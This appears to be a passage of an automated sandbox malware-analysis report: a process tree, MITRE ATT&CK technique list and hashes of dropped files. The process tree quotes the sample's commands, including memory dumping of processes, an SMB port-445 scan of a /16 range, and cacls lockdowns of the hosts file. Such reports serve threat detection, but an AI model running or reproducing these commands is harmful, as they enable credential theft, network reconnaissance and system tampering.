C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 1444 C:\Windows\TEMP\nmrmyinid\1444.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3888 C:\Windows\TEMP\nmrmyinid\3888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 1204 C:\Windows\TEMP\nmrmyinid\1204.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 972 C:\Windows\TEMP\nmrmyinid\972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2016 C:\Windows\TEMP\nmrmyinid\2016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 4888 C:\Windows\TEMP\nmrmyinid\4888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\nmrmyinid\mirzmlbjb\scan.bat2⤵PID:1656
-
C:\Windows\nmrmyinid\mirzmlbjb\ebkkcpcil.exeebkkcpcil.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2620
-
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 1656 C:\Windows\TEMP\nmrmyinid\1656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 4428 C:\Windows\TEMP\nmrmyinid\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6308
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:2708
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3560
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2340
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2492
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2532
-
-
-
C:\Windows\SysWOW64\ascsso.exeC:\Windows\SysWOW64\ascsso.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1544
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F1⤵PID:3312
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4376
-
-
C:\Windows\system32\cacls.execacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F2⤵PID:1816
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F1⤵PID:2108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3008
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F2⤵PID:5072
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\detvrlv.exe1⤵PID:3672
-
C:\Windows\ime\detvrlv.exeC:\Windows\ime\detvrlv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4328
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F1⤵PID:6016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6272
-
-
C:\Windows\system32\cacls.execacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F2⤵PID:6380
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F1⤵PID:5884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5612
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F2⤵PID:6196
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\detvrlv.exe1⤵PID:6564
-
C:\Windows\ime\detvrlv.exeC:\Windows\ime\detvrlv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6840
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
33.3MB
MD5e629bf2d21f75f3d0764c3cc1d437d22
SHA1b4b380162b317dcc92a92cca5c9ef242e14e679b
SHA2560c1675d3a894f0e475f10e8e3e24353023ed2927716e5dceac137a6e86c8daf6
SHA512b6f477a2000135a0a9ff31937ff48a2299173257a9b0f9c1a90d40c214981abce30d0f5289e5f76a4770dba31d7666c892ba3f6a7a9de3c3bd0161a39003cfdb
-
Filesize
44.2MB
MD563a551a7aca4582752745e75f76b013c
SHA185c7ffd0501615e1653ef7d1e86897bc6ab5237e
SHA256b7e83a30ecd6c349ccb68c0861e14a3b4446906f753f15ed20f5b9f53ab8513d
SHA512cba8d3468f375654099dde08eb35f646739ed78f12d2dfe9b8f9740e333210486338e5af57f43bb9fdd716c8e4c71e31da7f3c7a24b432a13fb8ed186dec03f6
-
Filesize
1.2MB
MD52d5e7e0533df9a388f0a0828069c3790
SHA1a4eba7c8be35b71fd5b37790527cce9ba05e1b50
SHA25602db36699c214135b8b36453f256dfb5d0f08b862c64a907a7d14a9c633ed660
SHA5127abc5ce18aa197e55cf03ffa597e6c6f5a96640b9f0a5bd53fb995b92276fc463a0e6c32bade6c6b5e1270837e9ba2a0639c568ee938874ba49c1d34cbec00a7
-
Filesize
4.1MB
MD54393e3254b77769fb7a9e3d305a0df29
SHA128568f6210362f0dda289fda4cc0d06c384155b7
SHA2564ddb911ccdf7b1eea6343427faab81abdf039bc9e15749a3dce8569142646061
SHA512ea9c31d831b06c412eacdcfe82b5ab04abb1cca3417d0800cfbb8d826dffdfe6c36b4b5c0e97b78dbf580afeac1237039efea0944eb03a4166000d431e3868a7
-
Filesize
4.0MB
MD506f5a7ca5327599360ce9bd6ca9eed2a
SHA18c24686b8d589167d3bae1589a2d383f46bb6cd8
SHA256fe5aea33d9c4e973109fd7aa07cb92d74d43b29d3e5ac9fd0b21a0b18e7321db
SHA512eb3883cf11c789178032754185e3c770019af8c79ab031b3b5e3630a741b8a613510eace24fb6ca203303f70a9b174dba67ff5279bf03610983fd9f16a032d6a
-
Filesize
7.5MB
MD5a56c66a60f9846e32674800358c8042b
SHA120c0aff0a8ebd4d62784d22a51cc8282c9a64860
SHA2568887bf37364d6e601484dc00979ce27f110b7a3bba16a9151f0011ec4da8130c
SHA5126f08479abac14feaf6fb2ac478ec080816b1a2446c0ca9cb821da19ae4a5bfe45a8604fd5bdd744ecd47d2945d83e1462a8761871364749799b6b00b583a10cb
-
Filesize
2.9MB
MD5128b8625ff99c05fedc0223606634a41
SHA1080e38e04691167e6ba48a9458451ca359e79bfc
SHA256dc09a178523c7354335acbb8552d8994cf9d7943dfeb0c2f7e3a7adba332d336
SHA512244e1cedd7175fe9ffb2cc521b47b26c3d22e4d21dfa6c0d70c4f44149c2aa0df4ffe18e80fc0a8988c55e49707f387f4f174d92428132d45c6a3e5d685ba477
-
Filesize
822KB
MD56f8e29e3e4de52dfc9a807ae09d71f90
SHA12e19d19f3e4798546f9898ceb1643f1f96f9da92
SHA256dedf478e45a3aea538e6bf5ba93753b66106217b334b878094b760f052385302
SHA512b3a9773550206b0d1e9df00d3d3f61f13fbec65b6810649ad90ef1978884e146beb54c7421818ddf75761cf98a5b6f136c8879262e6e498416db5019e3ed2e03
-
Filesize
26.5MB
MD50151d72a42caca0a6c678cf622dfbb6d
SHA168bc11bf4a0d9af4c42ae16c6911eec12713cb55
SHA256d9aa17fa7c51dc2c48759294cbfb79710dd372611b5e3929c338030052018553
SHA5124fe4e9974e95d25b8a818be2879bb84096c04c694a6c7d07be3e51f14172f5973f5ddd122c385788bc006065fd43c52635a5e05190fcfd38284b6c0e4341f688
-
Filesize
3.0MB
MD597e1628f2614041e82b79807faa63220
SHA13a31c4f02b316964d17f2b700fea35e45ce3daf4
SHA256d7c8f06c0f0904731618c2d863e4c93667950385f96356988977c6cb04d4ccda
SHA512540af3e17abb6b5d34e61f1cd08ceac950152a143be46c6ff2035931eba0755b6a505dc901d8ce678c8f1a4a3d01564b8bb2a9f7301cf69d0dc4ca143e39b4a2
-
Filesize
8.9MB
MD54850417952cad163a94b28d30939aecd
SHA107bdc037a95516d9a8169d1951bfda606ac82090
SHA2561b998c8328473d778a634e0f1fbdf08535ba5e4d55d8eb64ee35e793a882525a
SHA512dc796faafc6142b6a3d4df1808cd133c66db397313c317d15432c397db018758064e132afd1765d17c4e64b8d32655a5c1d54c129eb264c7f05f600b5666a75f
-
Filesize
20.8MB
MD54caa2474e53f002e5211b4bbed15a43a
SHA11d332784be5331d433979c055e66df9ed8f9b25c
SHA256b940582a0958dfe80da4f26e12d51614fc7d181e7b3800e1a38389162b231903
SHA512bdb077ce869f324f6aec302079b06365fdc855977b14143cd9fce7811467204e98c44b6d851310d7011f2f55c6a1509973b3319b5d47b94c62e48bc225367e1a
-
Filesize
8.5MB
MD5fbabeefa5326c8d8f490d00740334e0a
SHA131742379b2318be5e1c37a6751d2f292015a022e
SHA25685a0a9bccbb0d4bb721cd87f95e6c7bf170c771498f99eef2a82a2b912bcb87d
SHA512a667584ee93fe470702d4320ed900190e330ee719627cd2c16b939d69e5fd5658fff224b138bd4a1940ecd58a75f6cb5b9ae8e363360a9634e45068f3de22c9e
-
Filesize
1019KB
MD5b5b59512d5405d97a11eaff28cc7d724
SHA1f31f4c6ec9648a2e5ccd4013d993f4d53e938c80
SHA256015e23f03c4af55afab22e79ec119fad7de2ae519cb12b3018dd033479d682eb
SHA5123fdeeb2ddbf8120e2224d0cd493e657714e4ba7e50995d2a1e82e7dd18bc6a28aad3c46fb9acf7b47ce4c71d258481bf36d2b16b0cecb1db8074e43e61c61f9e
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
7.8MB
MD5187054a3400df60ec76bd1ad0aad4b37
SHA16cc315b6e0f3a9726a7e86de8a09dea7b27df3f2
SHA2561c2cd8258ca5398d03dfd38c6c948ad09757d16218b91e715297312e634c9a63
SHA512ae37a3d0c316630c63626dd08beb50bf75051f6bb0b77e5b46a6e40ab1bb905d32dadb952d69b841ae8207e39b1a2ec08319171988d86f01f20f54075173dc5a
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376